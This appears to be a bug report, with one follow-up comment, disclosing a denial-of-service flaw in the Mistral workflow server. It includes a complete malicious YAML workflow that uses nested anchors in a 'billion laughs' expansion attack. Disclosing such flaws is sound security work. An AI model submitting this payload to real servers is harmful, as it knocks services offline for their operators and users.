It is possible to perform a denial of service on Mistral server by submitting a malicious workflow definition file (YAML) that contains nested anchors. This looks exactly like an XML Entity Expansion attack (https://en.wikipedia.org/wiki/Billion_laughs_attack).
Example of malicious workflow below:
version: '2.0'
wf1:
type: direct
input:
- a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
- b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
- c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
- d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
- e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
- f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
- g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
- h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
- i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
tasks:
hello:
action: std.echo output="Hello"
wait-before: 1
publish:
result: <% task(hello).result %>
Sorry, I just re-read this. I see this is related to YAML. Not YAQL. I have hidden my previous comment as it was confusing.